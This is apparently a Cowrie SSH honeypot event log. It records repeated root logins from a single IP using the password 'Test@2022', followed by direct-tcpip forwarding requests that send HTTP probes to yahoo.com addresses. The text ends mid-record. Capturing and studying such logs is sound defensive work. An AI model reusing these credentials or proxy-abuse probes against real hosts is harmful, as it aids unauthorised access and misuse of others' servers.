{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.097040Z","src_ip":"213.209.150.239","session":"35d985c912c2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.144665Z","src_ip":"213.209.150.239","session":"35d985c912c2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55861,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fd9f4d14236","protocol":"ssh","message":"New connection: 213.209.150.239:55861 (1.2.3.4:22) [session: 2fd9f4d14236]","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.200509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.201522Z","src_ip":"213.209.150.239","session":"2fd9f4d14236"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.257912Z","src_ip":"213.209.150.239","session":"2fd9f4d14236"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.539962Z","src_ip":"213.209.150.239","session":"2fd9f4d14236"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":24127,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:24127","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.597424Z","session":"2fd9f4d14236"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.654212Z","src_ip":"213.209.150.239","session":"2fd9f4d14236"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":8482,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:8482","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.811012Z","session":"2fd9f4d14236"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.867668Z","src_ip":"213.209.150.239","session":"2fd9f4d14236"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.924979Z","src_ip":"213.209.150.239","session":"2fd9f4d14236"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55920,"dst_ip":"1.2.3.4","dst_port":22,"session":"93f754966d6b","protocol":"ssh","message":"New connection: 213.209.150.239:55920 (1.2.3.4:22) [session: 93f754966d6b]","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.971174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:23.971973Z","src_ip":"213.209.150.239","session":"93f754966d6b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:24.019127Z","src_ip":"213.209.150.239","session":"93f754966d6b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:24.254129Z","src_ip":"213.209.150.239","session":"93f754966d6b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":17234,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:17234","sensor":"my-vps","timestamp":"2025-08-26T00:56:24.302923Z","session":"93f754966d6b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:24.350188Z","src_ip":"213.209.150.239","session":"93f754966d6b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":21896,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:21896","sensor":"my-vps","timestamp":"2025-08-26T00:56:24.485581Z","session":"93f754966d6b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:24.533073Z","src_ip":"213.209.150.239","session":"93f754966d6b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:24.581072Z","src_ip":"213.209.150.239","session":"93f754966d6b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55970,"dst_ip":"1.2.3.4","dst_port":22,"session":"879acdd938d2","protocol":"ssh","message":"New connection: 213.209.150.239:55970 (1.2.3.4:22) [session: 879acdd938d2]","sensor":"my-vps","timestamp":"2025-08-26T00:56:24.627230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:24.628204Z","src_ip":"213.209.150.239","session":"879acdd938d2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:24.675131Z","src_ip":"213.209.150.239","session":"879acdd938d2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:24.909976Z","src_ip":"213.209.150.239","session":"879acdd938d2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":17510,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:17510","sensor":"my-vps","timestamp":"2025-08-26T00:56:24.958073Z","session":"879acdd938d2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:25.005541Z","src_ip":"213.209.150.239","session":"879acdd938d2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":2427,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:2427","sensor":"my-vps","timestamp":"2025-08-26T00:56:25.141431Z","session":"879acdd938d2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:25.188447Z","src_ip":"213.209.150.239","session":"879acdd938d2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:25.236283Z","src_ip":"213.209.150.239","session":"879acdd938d2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56010,"dst_ip":"1.2.3.4","dst_port":22,"session":"03c1ded13e76","protocol":"ssh","message":"New connection: 213.209.150.239:56010 (1.2.3.4:22) [session: 03c1ded13e76]","sensor":"my-vps","timestamp":"2025-08-26T00:56:25.291913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:25.293133Z","src_ip":"213.209.150.239","session":"03c1ded13e76"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:25.349768Z","src_ip":"213.209.150.239","session":"03c1ded13e76"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:25.632003Z","src_ip":"213.209.150.239","session":"03c1ded13e76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":28996,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:28996","sensor":"my-vps","timestamp":"2025-08-26T00:56:25.689736Z","session":"03c1ded13e76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:25.746492Z","src_ip":"213.209.150.239","session":"03c1ded13e76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":1588,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:1588","sensor":"my-vps","timestamp":"2025-08-26T00:56:25.903195Z","session":"03c1ded13e76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:25.959885Z","src_ip":"213.209.150.239","session":"03c1ded13e76"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:26.017886Z","src_ip":"213.209.150.239","session":"03c1ded13e76"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56062,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ce0fb2b8f9f","protocol":"ssh","message":"New connection: 213.209.150.239:56062 (1.2.3.4:22) [session: 0ce0fb2b8f9f]","sensor":"my-vps","timestamp":"2025-08-26T00:56:26.073323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:26.073934Z","src_ip":"213.209.150.239","session":"0ce0fb2b8f9f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:26.130602Z","src_ip":"213.209.150.239","session":"0ce0fb2b8f9f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:26.412948Z","src_ip":"213.209.150.239","session":"0ce0fb2b8f9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":28946,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:28946","sensor":"my-vps","timestamp":"2025-08-26T00:56:26.470651Z","session":"0ce0fb2b8f9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:26.527545Z","src_ip":"213.209.150.239","session":"0ce0fb2b8f9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":24875,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:24875","sensor":"my-vps","timestamp":"2025-08-26T00:56:26.683149Z","session":"0ce0fb2b8f9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:26.739756Z","src_ip":"213.209.150.239","session":"0ce0fb2b8f9f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:26.797041Z","src_ip":"213.209.150.239","session":"0ce0fb2b8f9f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56116,"dst_ip":"1.2.3.4","dst_port":22,"session":"0afb9ff9ef1b","protocol":"ssh","message":"New connection: 213.209.150.239:56116 (1.2.3.4:22) [session: 0afb9ff9ef1b]","sensor":"my-vps","timestamp":"2025-08-26T00:56:26.843496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:26.844325Z","src_ip":"213.209.150.239","session":"0afb9ff9ef1b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1